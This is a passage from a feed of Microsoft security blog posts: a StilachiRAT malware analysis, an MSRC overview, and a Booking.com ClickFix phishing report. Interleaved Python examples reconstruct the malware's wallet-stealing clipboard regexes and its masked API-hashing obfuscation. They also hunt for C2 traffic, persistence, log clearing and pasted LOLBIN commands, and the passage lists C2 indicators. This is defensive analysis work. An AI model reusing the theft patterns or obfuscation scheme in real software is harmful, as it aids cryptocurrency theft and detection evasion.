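        r"^\s*\b([0-9]*[.]*[a-wy-z][a-z]{2,}[ \t]*\b){12}\s*(\n|$)", re.MULTILINE),
    "TRX pass (any whitespace)": re.compile(
        r"^\s*\b([0-9]*[.]*?[a-wy-z][a-z]{2,}\s*\b){12}\s*(\n|$)", re.MULTILINE),
}


def scan_text(text):
    """Run every pattern over a text buffer (clipboard contents or a file's
    text) and return (label, matched_text) pairs in pattern order."""
    hits = []
    for label, pattern in TRX_PATTERNS.items():
        for m in pattern.finditer(text):
            hits.append((label, m.group(0).strip()))
    return hits


# Constructed clipboard samples (not real wallet data).
SAMPLE_CLIPBOARD = [
    # TRON-style address: 'T' followed by 33 alphanumerics
    "send to T1234567890abcdefghijklmnopqrstuvw please",
    # 0x-prefixed 64-hex private key
    "0x" + "ab" * 32,
    # 12-word seed phrase built from BIP39 words
    "abandon ability able about above absent absorb abstract absurd abuse access accident",
    # any 64-hex string, e.g. a file hash, also matches the key pattern
    "sha256: " + "0123456789abcdef" * 4,
    # 11 words: one short of a seed phrase, so neither TRX Pass pattern fires
    "abandon ability able about above absent absorb abstract absurd abuse access",
]

if __name__ == "__main__":
    for sample in SAMPLE_CLIPBOARD:
        print(repr(sample[:40]), "->", scan_text(sample))
```

The fourth sample shows the practical limit of the key pattern: any 64-character hex string matches, so an operator (or a defender reusing these patterns for detection) has to sift hashes out of the results; the fifth shows that an 11-word phrase is ignored, which is why the malware keeps polling the clipboard rather than reading it once.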

The same search expressions are then used to iterate files in the following locations:

  • %USERPROFILE%\Desktop
  • %USERPROFILE%\Recent

Figure 11. Access user’s files

Anti-forensic measures

StilachiRAT displays anti-forensic behavior by clearing event logs and checking certain system conditions to evade detection. This includes looping checks for analysis tools and sandbox timers that prevent its full activation in virtual environments commonly used for malware analysis.

Additionally, Windows API calls are obfuscated in multiple ways, and a custom algorithm is used to encode many text strings and values. This significantly slows down analysis, since recovering higher-level logic and code design becomes a more complex effort.

The malware employs API-level obfuscation techniques to impede manual analysis, specifically by concealing its use of Windows APIs (e.g., RegOpenKey()). Instead of referencing API names directly, it encodes them as checksums that are resolved dynamically at runtime. While this is a common technique in malware, the authors have introduced additional layers of obfuscation.

Precomputed API checksums are stored in multiple lookup tables, each masked with an XOR value. During launch, the malware selects the appropriate table based on the hashed API name, applies the correct XOR mask to decode the value, and dynamically resolves the corresponding Windows API function. The resolved function pointer is then cached, but with an additional XOR mask applied, preventing straightforward memory scans from identifying API references.
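Added example (not StilachiRAT’s code): a toy model in Python of the masked-checksum scheme described above, with the author side (building the masked tables), the runtime side (unmask the entry, resolve it against an export list, cache the pointer XOR-masked) and the analyst side (hashing a list of known export names to label the tables). The hash function (ROR-13), the table-selection rule, the masks and the export addresses are assumptions made for illustration; the post does not publish the malware’s actual algorithm or constants.

```python
# Toy model of the API-resolution scheme described above. The checksum
# function (ROR-13), the table selection rule, the masks and the fake export
# addresses are all assumptions for illustration, not StilachiRAT's constants.

def api_checksum(name):
    """32-bit ROR-13 hash over the ASCII API name (assumed algorithm)."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


MASKS = [0x13579BDF, 0x2468ACE0]      # one XOR mask per lookup table (assumed values)
CACHE_MASK = 0x5A5A5A5A               # mask applied to cached function pointers (assumed)

# Stand-in for a loaded DLL's export table: name -> address (constructed).
FAKE_EXPORTS = {
    "Sleep": 0x7FFE0010,
    "AllocConsole": 0x7FFE0020,
    "RegOpenKeyExW": 0x7FFE0030,
    "CreateProcessW": 0x7FFE0040,
    "WinExec": 0x7FFE0050,
}


def table_index(checksum):
    """Which table holds this checksum (assumed rule: low bit of the hash)."""
    return checksum % len(MASKS)


def build_tables(api_names):
    """Author side: precompute checksums and store each one XOR-masked."""
    tables = [[] for _ in MASKS]
    for name in api_names:
        c = api_checksum(name)
        i = table_index(c)
        tables[i].append(c ^ MASKS[i])
    return tables


def resolve(masked, table_idx, exports, cache):
    """Runtime side: unmask the table entry, walk the export list for a name
    whose checksum matches, cache the pointer XOR-masked, return the address."""
    if masked in cache:
        return cache[masked] ^ CACHE_MASK          # the cached value is never the raw pointer
    checksum = masked ^ MASKS[table_idx]
    for name, addr in exports.items():
        if api_checksum(name) == checksum:
            cache[masked] = addr ^ CACHE_MASK
            return addr
    return None


def recover(tables, candidate_names):
    """Analyst side: hash a list of known export names and map every masked
    entry back to a name; entries with no match are reported as unknown."""
    by_hash = {api_checksum(n): n for n in candidate_names}
    names = []
    for i, table in enumerate(tables):
        for masked in table:
            checksum = masked ^ MASKS[i]
            names.append(by_hash.get(checksum, "unknown:%08x" % checksum))
    return names


if __name__ == "__main__":
    tables = build_tables(list(FAKE_EXPORTS) + ["NtShutdownSystem"])
    cache = {}
    c = api_checksum("Sleep")
    print(hex(resolve(c ^ MASKS[table_index(c)], table_index(c), FAKE_EXPORTS, cache)))
    print(recover(tables, list(FAKE_EXPORTS)))
```

The recover() step is the practical takeaway for analysts: once the mask and the hash routine have been identified in the binary, a precomputed dictionary of export-name hashes (kernel32, advapi32, ntdll, and so on) turns the tables back into readable API names, and any entry that stays unknown points either to an API missing from the dictionary or to a hash routine that has not been reproduced correctly yet.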

Figure 12. Example of two function calls that resolve Sleep() and AllocConsole() Windows APIs

Figure 13. Function that initiates API resolution by identifying the correct lookup table for the checksum

Commands launched from the C2 server

StilachiRAT can run various commands received from the C2 server, including system reboot, log clearing, credential theft, launching applications, and manipulating system windows. It can also suspend the system, modify Windows registry values, and enumerate open windows, a command set suited to both espionage and system manipulation. Each command is identified by a number; the commands observed are detailed below.

07 – Dialog box

Uses the Windows API function ShowHTMLDialogEx() to display a dialog box with rendered HTML contents from a supplied URL.

Figure 14. Display a message box

08 – Log clearing

Given an event log type, the relevant Windows APIs are used to open and then clear the log entries.

Figure 15. Clear event logs

09 – System reboot

Adjusts its own token privileges to permit a system shutdown and then uses an undocumented Windows API to perform the action.

Figure 16. Shutdown the PC

13 – Network sockets

Appears to contain capability to receive a network address from C2 server and establish a new outbound connection.

14 – TCP incoming

Accepts an incoming network connection on the supplied TCP port.

15 – Terminate

If there’s an open network connection, then close it and disable the Windows service controlling this process. This appears to be the self-removal (uninstall) command.

16 – Initiate application

The malware creates a console window and initiates a command to launch the program provided by the C2 operator using the WinExec() API.

Figure 17. Initiate a program

19 – Enumerate windows

Iterates all windows of the current desktop looking for a requested title bar text. This could let the operator target specific GUI applications and their contents, both on screen and in the clipboard.

26 – Suspend

Uses the SetSuspendState() API to put the system into either a suspended (sleep) state or hibernation.

30 – Chrome credentials

Launches the earlier mentioned functionality to steal Google Chrome passwords.

Mitigations

Malware like StilachiRAT can be installed through various vectors. The following mitigations can help prevent this type of malware from infiltrating the system and reduce the attack surface:

  • In some cases, RATs can masquerade as legitimate software or software updates. Always download software from the official website of the software developer or from reputable sources.
  • Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
  • Turn on Safe Links and Safe Attachments for Office 365. In organizations with Microsoft Defender for Office 365, Safe Links scanning protects your organization from malicious links that are used in phishing and other attacks. Specifically, Safe Links provides URL scanning and rewriting of inbound email messages during mail flow, and time-of-click verification of URLs and links in email messages, Microsoft Teams, and supported Office 365 apps. Safe Attachments provides an additional layer of protection for email attachments that have already been scanned by anti-malware protection in Exchange Online Protection (EOP).
  • Enable network protection in Microsoft Defender for Endpoint to prevent applications or users from accessing malicious domains and other malicious content on the internet. You can audit network protection in a test environment to view which apps would be blocked before enabling network protection.

General hardening guidelines:

  • Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
  • Run endpoint detection and response in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode.
  • Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Turn on Potentially unwanted applications (PUA) protection in block mode in Microsoft Defender Antivirus. PUA are a category of software that can cause your machine to run slowly, display unexpected ads, or install other software that might be unexpected or unapproved.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques.
  • Turn on Microsoft Defender Antivirus real-time protection.

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects this threat as the following malware:

  • TrojanSpy:Win64/Stilachi.A

Microsoft Defender for Endpoint

The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

  • A process was injected with potentially malicious code
  • Process hollowing detected
  • Suspicious service launched
  • Possible theft of passwords and other sensitive web browser information

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article
  • Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Look for suspicious outbound network connections

Monitor network traffic for malicious activity caused by remote access trojans by focusing on identifying unusual outbound connections, irregular port activity, and suspicious data exfiltration patterns that may indicate RAT presence.

Outbound connections over ports used by common protocols such as HTTP/HTTPS (80/443), SMB (445), and DNS (53), or over less common ports such as 16000, can carry RAT traffic. Because TCP 53 and 443 are also used by ordinary traffic, the query below pairs the port filter (the three ports StilachiRAT selects from) with a list of known C2 domains; replace the placeholders with the indicators from this report.

let domains = dynamic(['domain1', 'domain2', 'domain3']);
DeviceNetworkEvents
| where RemotePort in (53, 443, 16000)
| where Protocol == "Tcp"
| where RemoteUrl has_any (domains)
| project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessCommandLine, ActionType, DeviceId, LocalIP, RemoteUrl, InitiatingProcessFileName
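Added example (not from the Microsoft post): the same filter logic as the query above, run in Python over constructed DeviceNetworkEvents-style rows, with the placeholder domain list replaced by the indicators from this report. The records, device names, process names and non-indicator IP addresses are made up.

```python
# Indicators from this report (defanged in the text; written plainly here so
# they can be compared against telemetry).
IOC_DOMAINS = {"app.95560.cc"}
IOC_IPS = {"194.195.89.47"}
C2_PORTS = {53, 443, 16000}   # ports StilachiRAT picks from
RARE_PORTS = {16000}          # the only one worth surfacing without an indicator match

# Constructed records shaped like DeviceNetworkEvents rows (not real telemetry).
EVENTS = [
    {"Timestamp": "2025-03-10T09:12:01Z", "DeviceName": "ws01", "Protocol": "Tcp",
     "RemotePort": 16000, "RemoteIP": "194.195.89.47", "RemoteUrl": "",
     "InitiatingProcessFileName": "example_host.exe"},
    # domain indicator seen with a different resolved address than the listed IP
    {"Timestamp": "2025-03-10T09:12:02Z", "DeviceName": "ws01", "Protocol": "Tcp",
     "RemotePort": 53, "RemoteIP": "198.51.100.20", "RemoteUrl": "app.95560.cc",
     "InitiatingProcessFileName": "example_host.exe"},
    # ordinary HTTPS: port matches, nothing else does
    {"Timestamp": "2025-03-10T09:13:00Z", "DeviceName": "ws02", "Protocol": "Tcp",
     "RemotePort": 443, "RemoteIP": "20.190.1.1", "RemoteUrl": "login.microsoftonline.com",
     "InitiatingProcessFileName": "chrome.exe"},
    # ordinary DNS over UDP
    {"Timestamp": "2025-03-10T09:13:05Z", "DeviceName": "ws02", "Protocol": "Udp",
     "RemotePort": 53, "RemoteIP": "10.0.0.2", "RemoteUrl": "",
     "InitiatingProcessFileName": "svchost.exe"},
    # rare port, no indicator: worth a look but lower confidence
    {"Timestamp": "2025-03-10T09:14:00Z", "DeviceName": "ws03", "Protocol": "Tcp",
     "RemotePort": 16000, "RemoteIP": "203.0.113.9", "RemoteUrl": "",
     "InitiatingProcessFileName": "unknown_tool.exe"},
    # known C2 address on a port outside the list: a port-first query misses this
    {"Timestamp": "2025-03-10T09:15:00Z", "DeviceName": "ws03", "Protocol": "Tcp",
     "RemotePort": 8080, "RemoteIP": "194.195.89.47", "RemoteUrl": "",
     "InitiatingProcessFileName": "curl.exe"},
]


def domain_matches(url, domains):
    """True if the host part of url is one of domains or a subdomain of one."""
    host = url.lower().split("://")[-1].split("/")[0].split(":")[0]
    return any(host == d or host.endswith("." + d) for d in domains)


def hunt(events, ioc_domains=IOC_DOMAINS, ioc_ips=IOC_IPS):
    """Return matches with a tier: 'ioc' for any connection to a known C2
    indicator (regardless of port), 'port-only' for TCP to a rare C2 port with
    no indicator match. Plain TCP/443 or TCP/53 without an indicator is not surfaced."""
    matches = []
    for ev in events:
        if ev["RemoteIP"] in ioc_ips or domain_matches(ev["RemoteUrl"], ioc_domains):
            matches.append({"tier": "ioc", "event": ev})
        elif ev["Protocol"] == "Tcp" and ev["RemotePort"] in RARE_PORTS:
            matches.append({"tier": "port-only", "event": ev})
    return matches


if __name__ == "__main__":
    for hit in hunt(EVENTS):
        ev = hit["event"]
        print(hit["tier"], ev["DeviceName"], ev["InitiatingProcessFileName"],
              ev["RemoteIP"], ev["RemoteUrl"], ev["RemotePort"])
```

Two tuning points this makes explicit: a bare port filter on 53 or 443 matches normal DNS and HTTPS traffic, so those ports are only surfaced together with an indicator match, whereas 16000 is rare enough to report on its own; and the query above filters on port before checking the domain, so a connection to a known C2 address on another port (the last sample) is only caught if the indicator match is applied independently of the port, as hunt() does.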

Look for signs of persistence

The malware can be run both as a Windows Service or a standalone component. To identify persistence and suspicious services, monitor for the following event IDs:

  • Event ID 7045 – a new service was installed on the system. Monitor for suspicious services.
  • Event ID 7040 – the start type of a service was changed (for example, to automatic or boot start, or to on-demand start). An automatic or boot start type lets the RAT come back after a reboot; on-demand means a process must ask the SCM to start the service.
  • Correlated with Event ID 4697 – a service was installed on the system (Security log)

DeviceEvents
| where ActionType == "ServiceInstalled"
| project Timestamp, DeviceId, ActionType, FileName, FolderPath, InitiatingProcessCommandLine

Look for anti-forensic behavior

To identify potential event log clearing, monitor for the following event IDs:

  • Event ID 1102 (Security log)
  • Event ID 104 (System log)

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain/IP/Hash indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Additionally, Sentinel users can use the following query to detect when the security event log has been cleared, a potential indicator of an attempt to erase system evidence.

SecurityEvent
| where EventID == 1102 and EventSourceName == "Microsoft-Windows-Eventlog"
| summarize StartTimeUtc = min(TimeGenerated), EndTimeUtc = max(TimeGenerated), EventCount = count() by Computer, Account, EventID, Activity
| extend HostName = tostring(split(Computer, ".")[0]), DomainIndex = toint(indexof(Computer, '.'))
| extend HostNameDomain = iff(DomainIndex != -1, substring(Computer, DomainIndex + 1), Computer)
| extend AccountName = tostring(split(Account, @'\')[1]), AccountNTDomain = tostring(split(Account, @'\')[0])
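Added example (not from the Microsoft post): the persistence checks from the previous section (event IDs 7045 and 7040) and the log-clearing checks from this one (1102 and 104) applied in Python to constructed event records shaped like rows of the Sentinel Event and SecurityEvent tables. The EventData fragments follow the field names the real events carry; the service, host and account names are made up, as is the allow-list of directories legitimate services install from.

```python
import xml.etree.ElementTree as ET

# Directories legitimate services normally install from (assumed allow-list).
TRUSTED_IMAGE_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
EVENTLOG_SOURCE = "Microsoft-Windows-Eventlog"


def event_data(**fields):
    """Build a constructed EventData fragment in the schema Windows uses."""
    body = "".join('<Data Name="%s">%s</Data>' % (k, v) for k, v in fields.items())
    return ('<EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
            '%s</EventData>' % body)


# Constructed records (not real telemetry). Field names follow the real events:
# 7045 carries ServiceName/ImagePath/StartType/AccountName; 7040 carries
# param1..param4 (display name, old start type, new start type, service name);
# 104 carries Channel and SubjectUserName; 1102 is matched on its source and
# the account that cleared the log.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Source": "Service Control Manager", "Computer": "ws01.corp.local", "Account": "",
     "EventData": event_data(ServiceName="UpdateHelperSvc", ImagePath="C:\\ProgramData\\updhlp\\host.exe",
                             ServiceType="user mode service", StartType="auto start", AccountName="LocalSystem")},
    {"EventID": 7045, "Source": "Service Control Manager", "Computer": "ws01.corp.local", "Account": "",
     "EventData": event_data(ServiceName="ExampleSvc", ImagePath="C:\\Windows\\System32\\svchost.exe -k netsvcs",
                             ServiceType="user mode service", StartType="auto start", AccountName="LocalSystem")},
    {"EventID": 7040, "Source": "Service Control Manager", "Computer": "ws01.corp.local", "Account": "",
     "EventData": event_data(param1="Update Helper Service", param2="demand start",
                             param3="auto start", param4="UpdateHelperSvc")},
    {"EventID": 1102, "Source": EVENTLOG_SOURCE, "Computer": "dc01.corp.local", "Account": "CORP\\jdoe",
     "EventData": ""},
    {"EventID": 104, "Source": EVENTLOG_SOURCE, "Computer": "ws01.corp.local", "Account": "",
     "EventData": event_data(SubjectUserName="jdoe", Channel="System")},
]


def event_data_fields(xml_text):
    """Parse the <Data Name="..."> elements of an EventData fragment into a dict,
    ignoring the XML namespace (the same extraction the KQL parse does by string matching)."""
    if not xml_text:
        return {}
    root = ET.fromstring(xml_text)
    return {el.get("Name"): (el.text or "") for el in root.iter()
            if el.tag.rsplit("}", 1)[-1] == "Data"}


def triage(events):
    """Apply the persistence and anti-forensic checks to a list of event
    records and return one finding per suspicious event."""
    findings = []
    for ev in events:
        eid, f = ev["EventID"], event_data_fields(ev["EventData"])
        reason = None
        if eid == 7045:
            image = f.get("ImagePath", "").strip().strip('"').lower()
            if not image.startswith(TRUSTED_IMAGE_PREFIXES):
                reason = "service %s installed from untrusted path %s (%s, account %s)" % (
                    f.get("ServiceName"), f.get("ImagePath"), f.get("StartType"), f.get("AccountName"))
        elif eid == 7040 and f.get("param3", "").lower() == "auto start":
            reason = "service %s start type changed from %s to auto start" % (f.get("param4"), f.get("param2"))
        elif eid == 1102 and ev["Source"] == EVENTLOG_SOURCE:
            reason = "Security log cleared by %s" % ev["Account"]
        elif eid == 104 and ev["Source"] == EVENTLOG_SOURCE:
            reason = "%s log cleared by %s" % (f.get("Channel"), f.get("SubjectUserName"))
        if reason:
            findings.append({"EventID": eid, "Computer": ev["Computer"], "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["EventID"], finding["Computer"], finding["reason"])
```

The 7045 check does what the KQL parse leaves to the analyst: it pulls ImagePath out of the EventData XML and compares it with the directories legitimate services install from, which is how a service pointing at a user-writable path stands out among the many benign installs. The 7040 record carries the service name in param4 rather than in a ServiceName field, so a parse written for 7045 returns empty values for 7040 rows; the triage reads the param fields for that event instead.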

Sentinel users can also use the following query to detect service installations or modifications in service settings, which may indicate potential persistence mechanisms used by attackers.

Event
// 7045: A service was installed in the system
// 7040: A service setting has been changed
| where Source == "Service Control Manager"
| where EventID in (7045, 7040)
| parse EventData with * 'ServiceName">' ServiceName "<" * 'ImagePath">' ImagePath "<" *
| parse EventData with * 'AccountName">' AccountName "<" *
| summarize StartTime = min(TimeGenerated), EndTime = max(TimeGenerated) by EventID, Computer, ServiceName, ImagePath, AccountName

Indicators of compromise

Indicator – Type – Description

  • 394743dd67eb018b02e069e915f64417bc1cd8b33e139b92240a8cf45ce10fcb – SHA-256 – WWStartupCtrl64.dll
  • 194.195.89[.]47 – IP address – C2
  • app.95560[.]cc – Domain name – C2

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

Microsoft is committed to delivering a comprehensive customer experience through various Microsoft offerings. Our approach goes beyond traditional support by focusing on detection, prevention, and in-depth mitigation to help customers quickly respond to security incidents and build resiliency. Want to know how to Build a More Secure Tomorrow? Check out our Unified and Security eBook and visit https://aka.ms/Unified

Dmitriy Pletnev and Daria Pop
Microsoft Incident Response

The post StilachiRAT analysis: From system reconnaissance to cryptocurrency theft appeared first on Microsoft Security Blog.

Categories: Microsoft

How MSRC coordinates vulnerability research and disclosure while building community

Microsoft Malware Protection Center - Thu, 03/13/2025 - 12:00pm

In an era where discovering and rapidly mitigating security vulnerabilities is more important than ever before, the Microsoft Security Response Center (MSRC) is at the center of this work. MSRC focuses on investigating vulnerabilities, coordinating their disclosure, and releasing security updates to help protect customers and Microsoft from current and emerging cyberthreats related to security and privacy. MSRC partners with product teams across Microsoft—as well as external security researchers—to investigate reports of security vulnerabilities affecting Microsoft products and services.

Learn more about the Microsoft Security Response Center

MSRC also fosters the development of a stronger and more effective security researcher community through a variety of initiatives, including the Microsoft bug bounty program, the BlueHat security conference, the MSRC blog, and internal security training for engineers.

Microsoft uses a Coordinated Vulnerability Disclosure (CVD) process that recognizes security researchers while disclosing vulnerabilities in a responsible and timely manner.

Collaboration through bug bounty programs and researcher recognition

Security researchers are incentivized to find vulnerabilities and report them through a Coordinated Vulnerability Disclosure (CVD) process. Some reported vulnerabilities are eligible for rewards as part of Microsoft’s bug bounty programs. These programs are an important part of our proactive strategy of incentivizing the external security research community to partner with us and help protect our customers from security threats. Since its inception in 2013, Microsoft’s bug bounty programs have awarded more than $60 million in bounties to security researchers.

In 2024, we announced expansions to several existing bounty programs, and launched a new Defender Bounty Program and AI Bounty Program. We also expanded our bug bounty programs with Microsoft Zero Day Quest, which adds $4 million in potential bug bounty rewards for research into high-impact areas, specifically cloud and AI. Security researchers who report a vulnerability that isn’t eligible for a bug bounty can still take part in the Microsoft Researcher Recognition Program and be recognized for their work on the Researcher Leaderboard.

Coordinated Vulnerability Disclosure (CVD)

Microsoft follows the CVD principle when partnering with external security researchers to respond to and mitigate vulnerabilities in our products and services. This approach gives researchers recognition for their work and provides Microsoft an opportunity to address newly reported vulnerabilities before bad actors can exploit them.

To better protect our products and services, MSRC partners with Microsoft engineering teams to build proactive mitigations using the information provided by both internal and external security researchers. This can significantly reduce or eliminate classes of vulnerabilities.

Many cloud service vulnerabilities are fixed by Microsoft on our servers and don’t require customers to take action to stay secure, but for transparency we now disclose all critical cloud common vulnerabilities and exposures (CVEs). In cases where Microsoft customers need to act, Microsoft provides customers with clear and timely security guidance.

To help customers accelerate their security response and remediation, Microsoft recently expanded our CVD strategy to include machine-readable Common Security Advisory Framework (CSAF) files that complement our existing CVD data sharing channels. With CSAF files, Microsoft customers now have machine-readable information on known vulnerabilities. This capability is part of our comprehensive strategy for vulnerability disclosure, which includes our Security Updates API and the human-readable vulnerability disclosures provided in the MSRC Security Update Guide.

Microsoft Active Protections Program (MAPP)

The Microsoft Active Protections Program (MAPP) gives security technology providers early access to vulnerability information so that they can more rapidly provide updated protections to their customers. More than 100 MAPP partners receive security vulnerability information from the MSRC in advance of Microsoft’s monthly security update release. Partners use this information to provide protections through their security software or devices, such as antivirus software, network-based intrusion detection systems, or host-based intrusion prevention systems.

To learn about the MAPP program, including which types of organizations are eligible to join MAPP, what is required of member organizations, and MAPP program tiers, read the MAPP Frequently Asked Questions.

Release of security updates

Microsoft-managed backend services require no additional customer action to stay secure. In cases where customers must take action to stay secure, we release security updates.

After a vulnerability that requires customers to take action has been fixed in our products, MSRC provides updates. MSRC releases security updates for most Microsoft products on the second Tuesday of each month at 10:00 AM PT and recommends that IT administrators and other customers plan their deployment schedules accordingly.

Cybersecurity education through content and conferences

A key component of MSRC’s work is to provide educational content for the security community. MSRC shares important public updates on vulnerabilities and more on the MSRC blog (you can also subscribe through the MSRC RSS feed). The latest information about security-related deployments, known vulnerabilities, and advisories can be found on the Security Update Guide.

MSRC also works to build a stronger security researcher community by hosting the BlueHat security conference. BlueHat brings together leading researchers and security practitioners, providing a platform to share knowledge and best practices around security. If you missed the latest conference, you can view on-demand presentations from past conferences or listen to the BlueHat Podcast (subscribe here).

Learn more about the Microsoft Security Response Center

To learn more about MSRC, visit us at msrc.microsoft.com. There, you can find detailed information on our programs and access educational resources. You can also learn more about MSRC and Microsoft’s related security initiatives through the following resources:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post How MSRC coordinates vulnerability research and disclosure while building community appeared first on Microsoft Security Blog.

Categories: Microsoft

Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware

Microsoft Malware Protection Center - Thu, 03/13/2025 - 11:00am

Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. As of February 2025, this campaign is ongoing.

This phishing attack specifically targets individuals in hospitality organizations in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe, that are most likely to work with Booking.com, sending fake emails purporting to be coming from the agency.

In the ClickFix technique, a threat actor attempts to take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware. This need for user interaction could allow an attack to slip through conventional and automated security features. In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.

Microsoft tracks this campaign as Storm-1865, a cluster of activity related to phishing campaigns leading to payment data theft and fraudulent charges. Organizations can reduce the impact of phishing attacks by educating users on recognizing such scams. This blog includes additional recommendations to help users and defenders defend against these threats.

Phishing campaign using the ClickFix social engineering technique

In this campaign, Storm-1865 identifies target organizations in the hospitality sector and targets individuals at those organizations likely to work with Booking.com. Storm-1865 then sends a malicious email impersonating Booking.com to the targeted individual. The content of the email varies greatly, referencing negative guest reviews, requests from prospective guests, online promotion opportunities, account verification, and more.

Figure 1. A sample phishing email, purporting to be from a prospective guest.

Figure 2. Another sample phishing email, purportedly requiring the recipient to address negative feedback about a hotel.

Figure 3. Another sample phishing email, purportedly requiring the recipient to verify their Booking.com account.

The email includes a link, or a PDF attachment containing one, claiming to take recipients to Booking.com. Clicking the link leads to a webpage that displays a fake CAPTCHA overlayed on a subtly visible background designed to mimic a legitimate Booking.com page. This webpage gives the illusion that Booking.com uses additional verification checks, which might give the targeted user a false sense of security and therefore increase their chances of getting compromised.

The fake CAPTCHA is where the webpage employs the ClickFix social engineering technique to download the malicious payload. This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard:

Figure 4. A screenshot of the fake Booking.com webpage, with the fake CAPTCHA overlay outlining the ClickFix process.

The command downloads and launches malicious code through mshta.exe:

Figure 5. An example of the mshta.exe command that the targeted user launches.

This campaign delivers multiple families of commodity malware, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. Depending on the specific payload, the specific code launched through mshta.exe varies. Some samples have downloaded PowerShell, JavaScript, and portable executable (PE) content.
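On the endpoint, a command pasted into the Run dialog leaves a trace in the RunMRU registry key, which is the artifact the "Suspicious command in RunMRU registry" alert listed later in this post refers to. The following Python is an added example, not code from the Microsoft post: it parses constructed RunMRU-style values (placeholder hostnames) and flags commands that pair a living-off-the-land binary such as mshta with a remote URL or with hidden-window or encoded-command switches.

```python
"""Flag ClickFix-style commands recorded in the Windows Run dialog history.

Added example, not code from the Microsoft post. The Run dialog stores what a
user typed under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU:
one value per entry (named a, b, c, ...) holding the command followed by "\\1",
plus an MRUList value whose letters give most-recent-first order. The entries
below are constructed samples with placeholder hostnames.
"""
import re
from dataclasses import dataclass, field

# Living-off-the-land binaries that ClickFix lures tell the user to launch.
LOLBINS = {"mshta", "powershell", "pwsh", "cmd", "curl", "bitsadmin",
           "rundll32", "msiexec", "certutil", "wscript", "cscript"}

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# Hidden-window / encoded-command switches a user rarely types by hand.
SUSPICIOUS_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand|nop|noprofile|w\s+hidden|"
    r"windowstyle\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b")


@dataclass
class Finding:
    value_name: str
    command: str
    reasons: list = field(default_factory=list)


def parse_runmru(values: dict) -> list:
    """Return (value_name, command) pairs, most recent first, from a RunMRU value set."""
    items = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        command = raw[:-2] if raw.endswith("\\1") else raw  # strip the trailing "\1"
        items.append((name, command.strip()))
    return items


def classify(command: str) -> list:
    """Return why a Run-box command looks like a ClickFix paste, or [] if it looks benign."""
    tokens = command.split()
    if not tokens:
        return []
    # Normalise '"C:\Windows\System32\mshta.exe"' to 'mshta'.
    binary = tokens[0].strip('"').rsplit("\\", 1)[-1].lower()
    if binary.endswith(".exe"):
        binary = binary[:-4]
    if binary not in LOLBINS:
        return []
    reasons = []
    if URL_RE.search(command):
        reasons.append("pulls content from a remote URL")
    if SUSPICIOUS_FLAGS.search(command):
        reasons.append("uses hidden-window or encoded-command switches")
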